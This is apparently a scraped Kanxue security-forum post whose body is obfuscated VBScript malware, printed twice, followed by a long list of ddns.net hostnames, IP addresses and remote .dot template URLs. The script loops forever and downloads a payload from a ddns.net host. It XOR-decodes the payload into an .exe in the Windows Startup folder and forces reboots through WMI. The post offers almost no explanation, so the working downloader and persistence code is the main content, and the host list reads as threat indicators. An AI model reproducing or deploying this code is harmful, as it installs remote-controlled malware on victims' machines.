本文为看雪论坛精华文章
看雪论坛作者ID:顾何
Dim uKSUBtGo
uKSUBtGo = "Set WShell=CreateObject(""WSc" + "ri" + "pt.S" + "hel" + "l"")"
Set vfKtZARk = CreateObject("WScr" + "ipt.Ne" + "two" + "rk")
wscript.shell
wscript.Network
Set wEDMwGJH = CreateObject("Sc" + "rip" + "ting.Fi" + "leSy" + "stemOb" + "ject")
AppPaths = Environ("Appdata")
Function CLDCvmeg(xhmjPnsk)
On Error Resume Next
Set GHPiNqEA = CreateObject("MSXML2.XMLHTTP")
With GHPiNqEA
.Open "GET", xhmjPnsk, False
.send
End With
If GHPiNqEA.Status = 200 Then
CLDCvmeg = GHPiNqEA.ResponseBody
End If
End Function
Function Encode( KWKhBKJb, QuByZuyg, zgVWzifW )
Dim UIzlfDOE, sRMmQeTH, LVFaTeVS, JKCjSZfP, nLGKrzOK, WDDOZIip
Const ForAppending = 8
Const ForReading = 1
Const ForWriting = 2
Const TristateFalse = 0
Const TristateMixed = -2
Const TristateTrue = -1
Const TristateUseDefault = -2
On Error Resume Next
If Not IsArray( zgVWzifW ) Then
zgVWzifW = Array( zgVWzifW )
End If
For UIzlfDOE = 0 To UBound( zgVWzifW )
If Not IsNumeric( zgVWzifW(i) ) Then
Encode = 1032
Exit Function
End If
If zgVWzifW(UIzlfDOE) < 0 Or zgVWzifW(UIzlfDOE) > 255 Then
Encode = 1031
Exit Function
End If
Next
Set sRMmQeTH = CreateObject( "Scripting.FileSystemObject" )
If sRMmQeTH.FileExists( KWKhBKJb ) Then
Set LVFaTeVS = sRMmQeTH.GetFile( KWKhBKJb )
Set nLGKrzOK = LVFaTeVS.OpenAsTextStream( ForReading, TriStateFalse )
Else
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
Set sRMmQeTH = Nothing
Exit Function
End If
If sRMmQeTH.FileExists( QuByZuyg ) Then
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
If sRMmQeTH.Fileexists( KWKhBKJb) Then sRMmQeTH.DeleteFile KWKhBKJb
Set sRMmQeTH = Nothing
Exit Function
Else
Set JKCjSZfP = sRMmQeTH.CreateTextFile( QuByZuyg, True, False )
End If
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream
For UIzlfDOE = 0 To UBound( zgVWzifW )
UIzlfDOE + 1 mod ( UBound( zgVWzifW ))
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(UIzlfDOE) )
if nLGKrzOK.AtEndOfStream Then Exit Do
Next
Loop
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream
UIzlfDOE = ( UIzlfDOE + 1 ) \ ( UBound( zgVWzifW ) + 1 )
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(WDDOZIip) )
UIzlfDOE=UIzlfDOE+1
If WDDOZIip<UBound( zgVWzifW ) Then
WDDOZIip=WDDOZIip+1
else WDDOZIip=0
End If
Loop
JKCjSZfP.Close
If sRMmQeTH.Fileexists(KWKhBKJb) Then sRMmQeTH.DeleteFile KWKhBKJb
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
Set JKCjSZfP = Nothing
Set sRMmQeTH = Nothing
On Error Goto 0
End Function
Function GetMxUZhZHN( JVVqpSiS )
Dim UIzlfDOE, zgVWzifW( )
ReDim zgVWzifW( Len( JVVqpSiS ) - 1 )
For UIzlfDOE = 0 To UBound( zgVWzifW )
zgVWzifW(UIzlfDOE) = Asc( Mid( JVVqpSiS, UIzlfDOE + 1, 1 ) )
Next
GetMxUZhZHN = zgVWzifW
End Function
Function JGFAPnao(ByVal qqKtOALe)
Dim VIkwJSQM
Const yJEHBKZk = "abcdefghijklmnopqrstuvwxyz0123456789"
Randomize
For UIzlfDOE = 1 To qqKtOALe
VIkwJSQM = VIkwJSQM & Mid(yJEHBKZk, Int(36 * Rnd + 1), 1)
Next
JGFAPnao = VIkwJSQM
End Function
Sub save(data)
Dim IDrBJtww
IDrBJtww = "1"
IDrBJtww = JGFAPnao(5)
Set VSvGvYGC = CreateObject("Scripting.FileSystemObject")
Set xIrnqUVA = CreateObject("ADODB.Stream")
On Error Resume Next
xIrnqUVA.Open
xIrnqUVA.Type = 1
xIrnqUVA.Write (data)
xIrnqUVA.Position = 0
Set VSvGvYGC = Nothing
xIrnqUVA.SaveToFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
xIrnqUVA.Close
WScript.Sleep 7273
Set yBfuPFFD = CreateObject("Scripting.FileSystemObject")
Set FBwpkCFY = yBfuPFFD.GetFile("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt")
If FBwpkCFY.Size < 12425 Then FBwpkCFY.Delete
Dim arrMxUZhZHN, oBsaEHDX
arrMxUZhZHN = GetMxUZhZHN( "9AC9AA87")
oBsaEHDX = Encode( "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt", "C:\Users\Shyt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+IDrBJtww+".exe", arrMxUZhZHN )
WScript.Sleep 6425
If oBsaEHDX <> 0 Then
End If
End Sub
pKeIwNCN = 1
Do While pKeIwNCN > 0
WScript.Sleep 181244
save CLDCvmeg("http://korneliuswork.ddns.net/WIN-IHN30SD7IMB_9AC9AA87//rebootor.php")
Dim YWZxbTGp, dIisjAUJ, JgEairIr, VSvGvYGC
Set CDDtmtsF = CreateObject("Scripting.FileSystemObject")
YWZxbTGp = CDDtmtsF.GetParentFolderName(WScript.ScriptFullName)
With WScript.CreateObject("Scripting.FileSystemObject")
Set sRMmQeTH = CreateObject("Scripting.FileSystemObject")
If sRMmQeTH.Fileexists("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt") Then sRMmQeTH.DeleteFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
JgEairIr = 0
For Each dIisjAUJ In .GetFolder(YWZxbTGp).Files
If UCase(.GetExtensionName(dIisjAUJ.Name)) = UCase("exe") Then
JgEairIr = JgEairIr + 1
End If
Next
If (JgEairIr > 2) Then
Dim YncDXDKj, BLxBKzNR, BLxBKzNRSheck
Set YncDXDKj = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")
Set BLxBKzNR = YncDXDKj.Instances_
For Each BLxBKzNRSheck In BLxBKzNR
BLxBKzNRSheck.Reboot()
Next
End If
End With
Loop
Function CLDCvmeg(xhmjPnsk)
On Error Resume Next
Set GHPiNqEA = CreateObject("MSXML2.XMLHTTP")
With GHPiNqEA
.Open "GET", xhmjPnsk, False
.send
End With
If GHPiNqEA.Status = 200 Then
CLDCvmeg = GHPiNqEA.ResponseBody
End If
End Function
Function Encode( KWKhBKJb, QuByZuyg, zgVWzifW )
Dim UIzlfDOE, sRMmQeTH, LVFaTeVS, JKCjSZfP, nLGKrzOK, WDDOZIip
Const ForAppending = 8
Const ForReading = 1
Const ForWriting = 2
Const TristateFalse = 0
Const TristateMixed = -2
Const TristateTrue = -1
Const TristateUseDefault = -2
On Error Resume Next
If Not IsArray( zgVWzifW ) Then
zgVWzifW = Array( zgVWzifW )
End If
For UIzlfDOE = 0 To UBound( zgVWzifW )
If Not IsNumeric( zgVWzifW(i) ) Then
Encode = 1032
Exit Function
End If
If zgVWzifW(UIzlfDOE) < 0 Or zgVWzifW(UIzlfDOE) > 255 Then
Encode = 1031
Exit Function
End If
Next
Set sRMmQeTH = CreateObject( "Scripting.FileSystemObject" )
If sRMmQeTH.FileExists( KWKhBKJb ) Then
Set LVFaTeVS = sRMmQeTH.GetFile( KWKhBKJb )
Set nLGKrzOK = LVFaTeVS.OpenAsTextStream( ForReading, TriStateFalse )
Else
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
Set sRMmQeTH = Nothing
Exit Function
End If
If sRMmQeTH.FileExists( QuByZuyg ) Then
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
If sRMmQeTH.Fileexists( KWKhBKJb) Then sRMmQeTH.DeleteFile KWKhBKJb
Set sRMmQeTH = Nothing
Exit Function
Else
Set JKCjSZfP = sRMmQeTH.CreateTextFile( QuByZuyg, True, False )
End If
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream
For UIzlfDOE = 0 To UBound( zgVWzifW )
UIzlfDOE + 1 mod ( UBound( zgVWzifW ))
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(UIzlfDOE) )
if nLGKrzOK.AtEndOfStream Then Exit Do
Next
Loop
set UIzlfDOE = 0
Do Until nLGKrzOK.AtEndOfStream
UIzlfDOE = ( UIzlfDOE + 1 ) \ ( UBound( zgVWzifW ) + 1 )
JKCjSZfP.Write Chr( Asc( nLGKrzOK.Read( 1 ) ) Xor zgVWzifW(WDDOZIip) )
UIzlfDOE=UIzlfDOE+1
If WDDOZIip<UBound( zgVWzifW ) Then
WDDOZIip=WDDOZIip+1
else WDDOZIip=0
End If
Loop
JKCjSZfP.Close
If sRMmQeTH.Fileexists(KWKhBKJb) Then sRMmQeTH.DeleteFile KWKhBKJb
nLGKrzOK.Close
Set nLGKrzOK = Nothing
Set LVFaTeVS = Nothing
Set JKCjSZfP = Nothing
Set sRMmQeTH = Nothing
On Error Goto 0
End Function
Function GetMxUZhZHN( JVVqpSiS )
Dim UIzlfDOE, zgVWzifW( )
ReDim zgVWzifW( Len( JVVqpSiS ) - 1 )
For UIzlfDOE = 0 To UBound( zgVWzifW )
zgVWzifW(UIzlfDOE) = Asc( Mid( JVVqpSiS, UIzlfDOE + 1, 1 ) )
Next
GetMxUZhZHN = zgVWzifW
End Function
Function JGFAPnao(ByVal qqKtOALe)
Dim VIkwJSQM
Const yJEHBKZk = "abcdefghijklmnopqrstuvwxyz0123456789"
Randomize
For UIzlfDOE = 1 To qqKtOALe
VIkwJSQM = VIkwJSQM & Mid(yJEHBKZk, Int(36 * Rnd + 1), 1)
Next
JGFAPnao = VIkwJSQM
End Function
Sub save(data)
Dim IDrBJtww
IDrBJtww = "1"
IDrBJtww = JGFAPnao(5)
Set VSvGvYGC = CreateObject("Scripting.FileSystemObject")
Set xIrnqUVA = CreateObject("ADODB.Stream")
On Error Resume Next
xIrnqUVA.Open
xIrnqUVA.Type = 1
xIrnqUVA.Write (data)
xIrnqUVA.Position = 0
Set VSvGvYGC = Nothing
xIrnqUVA.SaveToFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
xIrnqUVA.Close
WScript.Sleep 7273
Set yBfuPFFD = CreateObject("Scripting.FileSystemObject")
Set FBwpkCFY = yBfuPFFD.GetFile("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt")
If FBwpkCFY.Size < 12425 Then FBwpkCFY.Delete
Dim arrMxUZhZHN, oBsaEHDX
arrMxUZhZHN = GetMxUZhZHN( "9AC9AA87")
oBsaEHDX = Encode( "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt", "C:\Users\Shyt\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"+IDrBJtww+".exe", arrMxUZhZHN )
WScript.Sleep 6425
If oBsaEHDX <> 0 Then
End If
End Sub
pKeIwNCN = 1
Do While pKeIwNCN > 0
WScript.Sleep 181244
save CLDCvmeg("http://korneliuswork.ddns.net/WIN-IHN30SD7IMB_9AC9AA87//rebootor.php")
Dim YWZxbTGp, dIisjAUJ, JgEairIr, VSvGvYGC
Set CDDtmtsF = CreateObject("Scripting.FileSystemObject")
YWZxbTGp = CDDtmtsF.GetParentFolderName(WScript.ScriptFullName)
With WScript.CreateObject("Scripting.FileSystemObject")
Set sRMmQeTH = CreateObject("Scripting.FileSystemObject")
If sRMmQeTH.Fileexists("C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt") Then sRMmQeTH.DeleteFile "C:\Users\Shyt\AppData\Roaming\"+ IDrBJtww +".txt"
JgEairIr = 0
For Each dIisjAUJ In .GetFolder(YWZxbTGp).Files
If UCase(.GetExtensionName(dIisjAUJ.Name)) = UCase("exe") Then
JgEairIr = JgEairIr + 1
End If
Next
If (JgEairIr > 2) Then
Dim YncDXDKj, BLxBKzNR, BLxBKzNRSheck
Set YncDXDKj = GetObject("WinMgmts:{(Shutdown,RemoteShutdown)}!\\.\Root\CIMV2:Win32_OperatingSystem")
Set BLxBKzNR = YncDXDKj.Instances_
For Each BLxBKzNRSheck In BLxBKzNR
BLxBKzNRSheck.Reboot()
Next
End If
End With
Loop
http://yotaset.ddns.net/yota.dot
http://yotaset.ddns.net/
188.225.25.50
2.59.41.5
liqds.ddns.net 157.230.156.245
rifloreds.ddns.net 103.63.2.234
sebastiano.ddns.net 95.252.110.118 87.7.234.104 79.49.225.156
viewer.ddns.net 113.22.110.254 113.22.108.52 1.55.228.111
servincnet.ddns.net 51.75.207.74
maritatdeq.ddns.net 51.68.3.7
gsae.ddns.net 107.180.50.241
azomoney.ddns.net 185.136.159.224
conquer.ddns.net 197.57.70.187 197.57.203.100 197.57.33.182
pft0.ddns.net 42.2.152.197 1.65.198.132 1.65.206.162
pft0.ddns.net 42.2.152.197 1.65.198.132 1.65.206.162
service-paypalinc.ddns.net 62.210.119.140
icbc-pdc.ddns.net 159.138.11.152
harryng.ddns.net 105.112.104.181 185.247.228.13
xtremeratbilubilu.ddns.net 177.45.197.125 201.68.102.203
appleinc-webserv.ddns.net 134.209.189.165
isabellehome.ddns.net 82.64.31.82
evans227.ddns.net 185.165.153.31 194.5.98.19
sitertg.ddns.net 92.151.31.112 86.238.87.95 82.124.150.35
yasserexe.ddns.net 105.158.139.53 196.206.123.224 41.142.188.83
boseburo.ddns.net 79.247.91.19 79.247.86.117 79.247.88.177
hempelnextcloud.ddns.net 87.144.65.24 93.203.166.179 217.227.255.230
adsstorepos.ddns.net 201.123.73.13 201.123.20.33 201.123.66.60
zigf.ddns.net 91.193.75.66
sterytatoo.ddns.net 191.88.16.185 181.58.16.104
dbestgroupz.ddns.net 45.143.222.19
mynetwork.ddns.net 179.43.160.187 5.79.127.177
monworldidreset.ddns.net 51.75.194.39
yitfoh.ddns.net 52.139.244.149 52.230.61.128
btcnode.ddns.net 81.105.101.129
rmaos.ddns.net 185.62.189.133 197.211.61.129 91.236.116.189
jsoldnerfl.ddns.net 98.244.254.121
accontsupdateserv.ddns.net 165.227.39.38
westfalls.ddns.net 172.12.238.48
databyte34322.ddns.net 199.192.28.70
notathome.ddns.net 116.87.80.124 58.182.23.208 27.125.179.20
tyhhome.ddns.net 121.122.62.61
takik.ddns.net 153.188.235.250 220.96.125.189 180.27.216.207
izushuqsinc.ddns.net 174.127.99.145 103.200.6.3
relushd.ddns.net 126.99.225.57 126.7.225.197 126.51.236.45
posno.ddns.net 185.225.246.244 78.136.126.162
electrumx.ddns.net 165.73.105.234 165.73.107.106 102.182.254.126
binkar.ddns.net 61.5.71.185 36.74.55.132 36.79.234.98
christos.ddns.net 94.64.3.62
problemasmentais.ddns.net 181.221.208.245
host32.ddns.net 69.114.98.32 93.171.214.249 177.54.144.148
zxz.ddns.net 62.210.187.148 190.2.136.120 190.2.136.141
mywebhost.ddns.net 35.187.243.190
conterprise.ddns.net 95.89.143.8
popo856.ddns.net 78.199.5.77
pqhanh.ddns.net 222.150.1.208
dynupdate.ddns.net 58.158.177.102 91.235.168.230
136007a.ddns.net 120.157.39.129
izgemma.ddns.net 188.93.238.18 185.236.230.13 188.93.238.184
westensee.ddns.net 173.174.180.172
authentication008f.ddns.net 159.203.114.23
dfdfddf.ddns.net 31.43.223.111
pizzo3000.ddns.net 84.226.250.138 89.217.39.89 188.155.110.176
irfanadi.ddns.net 103.126.226.22
labeltogo.ddns.net
hd-proip.ddns.net 185.172.88.14 193.200.164.156 193.200.164.196
infectingraven.ddns.net 51.89.204.70 77.167.100.196
arlingford.ddns.net 81.129.197.68 81.153.174.70 86.132.12.91
disneyadamsfamily.ddns.net 67.174.118.149
azulnewspromo.ddns.net 108.178.29.162
itvrus2.ddns.net 149.56.241.228
molnarek.ddns.net 31.46.49.209
archimede1.ddns.net 185.38.150.159 5.226.139.5 51.255.95.121
amfamily6.ddns.net 73.22.174.61
mcmurphy7777.ddns.net 62.46.90.193 91.114.218.162 91.114.220.75
snup2019.ddns.net 105.112.115.126 105.112.113.224 105.112.120.121
zym.ddns.net 119.224.74.65
swshield.ddns.net 71.63.4.213
brian-computer.ddns.net 73.80.197.86
kissmeifucan.ddns.net 197.211.58.82 197.210.28.173 185.244.30.206
warhola.ddns.net 71.241.240.167 173.73.178.97 71.163.178.47
boncazmardz.ddns.net 51.68.3.7
gustaver.ddns.net 37.120.165.226 185.244.194.156 94.16.113.104
plspdlx.ddns.net 51.68.3.7
heinrich-fg.ddns.net 84.137.87.95 84.137.89.213 84.137.85.221
officezd.ddns.net 166.62.28.107
mchacker66.ddns.net 196.234.204.93 141.255.144.33 196.229.160.98
claviola.ddns.net 77.248.167.175 62.195.40.231
accounts-allerts001.ddns.net 157.245.231.137
bigloop.ddns.net 172.113.5.209
a2953575.ddns.net 175.180.247.26 175.181.212.179 175.182.99.78
tengomusica.ddns.net 71.6.201.66
iptvcolombia.ddns.net 66.240.236.25
sanvicente46.ddns.net 81.37.111.77
rdinterationalbrest.ddns.net 107.182.236.81
jfruhl713.ddns.net 80.108.124.29 62.178.35.113 84.112.139.164
fastway.ddns.net 62.210.90.216 195.154.178.101 54.39.53.95
pinetree.ddns.net 116.12.61.63
tatiefel.ddns.net 95.94.217.80 95.94.214.7 95.93.89.213
drunkconvert.ddns.net 136.49.131.171
fredooo.ddns.net 90.112.4.87 2.7.64.17 90.112.225.140
trasurablog.ddns.net 78.192.44.195
uc4lnc.ddns.net 185.14.166.35
suporte-30horas.ddns.net 177.189.7.171 177.139.72.190 187.11.37.120
23-11-6sgghh.ddns.net 103.27.238.234
http://office-constructor.ddns.net/obce.dot
http://librebooton.ddns.net/booton.dot
http://inbox-office.ddns.net/inbox.dot
http://libre-templates.ddns.net/internet.dot
http://word-gread.ddns.net/gread.dot
http://win-apu.ddns.net/apu.dot
http://office-lite.ddns.net/lite.dot
http://libre-templates.ddns.net/internet.dot
http://office-crash.ddns.net/crash.dot
http://office-out.ddns.net/out.dot
http://libre-templates.ddns.net/internet.dot
http://librebooton.ddns.net/booton.dot
http://micro-set.ddns.net/micro.dot
http://office-constructor.ddns.net/zaput.dot
http://win-ss.ddns.net/ss.dot
http://office-constructor.ddns.net/zaput.dot
http://get-icons.ddns.net/ComputerName_HardDriveSerialNumber//autoindex.php
http://network-crash.ddns.net/
http://network-crash.ddns.net/ComputerName_HardDriveSerialNumber/autoindex.php
看雪ID:顾何
https://bbs.pediy.com/user-757351.htm
推荐文章++++